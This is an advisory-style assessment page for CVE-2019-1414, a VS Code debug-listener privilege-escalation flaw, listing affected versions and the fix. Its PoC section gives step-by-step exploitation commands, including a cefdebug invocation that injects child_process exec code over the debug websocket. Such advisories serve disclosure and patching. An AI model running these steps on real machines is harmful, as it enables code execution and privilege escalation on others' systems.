Attacker Value
Very High
0

CVE-2019-1414

Disclosure Date: January 24, 2020 Last updated March 10, 2020

Exploitability

(1 user assessed) Moderate
Attack Vector
Local
Privileges Required
Low
User Interaction
None

Description

An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer, aka ‘Visual Studio Code Elevation of Privilege Vulnerability’.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

Vulnerability:

  • An elevation of privilege vulnerability exists in Visual Studio Code when it exposes a debug listener to users of a local computer. A local attacker who successfully exploited the vulnerability could inject arbitrary code to run in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Software Versions Affected:

  • All versions < 1.39.1

Vulnerability Severity:

  • High

Vulnerability Fix:

  • Upgrade VS Code to version 1.39.1 or later.

Vulnerability POC:

  • If Visual Studio code runs as Administrator, privileges can be elevated to the highest level, i.e. NT AUTHORITY\SYSTEM.
  • If Visual Studio Code runs as another user, command execution can be achieved as that user.
  • If Visual Studio Code runs in High Integrity context, any UAC settings can bypassed and can elevate from Low/Medium levels.

  • Linux (Article detailing the exploit):
    1. ps aux | grep inspect
      • Find the debug port
    2. node index.js 127.0.0.1 <PORT> <COMMAND>
      • Run index.js supplied with the ip address, port, and command you want to run

  • Windows:
    1. ./cefdebug.exe
      • Find the debug port
      • cefdebug is a minimal commandline utility and/or reference code for using libwebsockets to connect to an electron/CEF/chromium debugger.
        2 ./cefdebug.exe —url ws://127.0.0.1:<PORT>/<UUID> —code “process.mainModule.require(‘child_process’).exec(’<COMMAND>’)”
      • Run cefdebug supplied with the debug websocket url and the command you want to run

General Information

Additional Info

Technical Analysis